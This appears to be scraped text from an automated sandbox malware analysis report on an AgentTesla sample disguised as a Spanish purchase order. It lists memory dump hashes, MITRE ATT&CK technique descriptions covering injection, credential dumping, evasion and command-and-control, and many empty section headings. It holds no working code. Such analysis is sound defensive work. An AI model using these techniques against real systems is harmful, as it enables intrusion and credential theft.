Source File: 0000000B.00000002.7350284492.0000000001430000.00000040.00000010.sdmp, Offset: 01430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a010a10ff7f7d3204d56674e71cc91667b0f943e528ea308ee7b9ce2dbfec84
Instruction ID: 7583dc0a9ee2d6e45659ea7f4035052c0a84368b59386e2490f115d3f5d290aa
Opcode Fuzzy Hash: 6a010a10ff7f7d3204d56674e71cc91667b0f943e528ea308ee7b9ce2dbfec84
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0104EA88, Relevance: 3.9, Strings: 3, Instructions: 196COMMON

Download Yara Rule

Strings

$*l, xrefs: 0104EB94
H.l, xrefs: 0104EC34
$*l, xrefs: 0104EB88

Memory Dump Source

Source File: 0000000B.00000002.7348818252.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID:
String ID: H.l$$*l$$*l
API String ID: 0-866040086
Opcode ID: eb98e1bb13ff97db2bd9a399b15609ac8440a35707bd20cacf322e8bd32aba5e
Instruction ID: cf8bf8da631b21b7ee7ce97fab114f8e48f4e440bbb34bd4468de58c7e22bfe2
Opcode Fuzzy Hash: eb98e1bb13ff97db2bd9a399b15609ac8440a35707bd20cacf322e8bd32aba5e
Instruction Fuzzy Hash: 03519CB07085148F9B599B79C8DC62E3AE6BFC564530980BAD543CB3A1DF2CCC02D7A6

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Orden de compra M244545.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Agenttesla

Yara Overview

Memory Dumps

Sigma Overview

Networking:

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets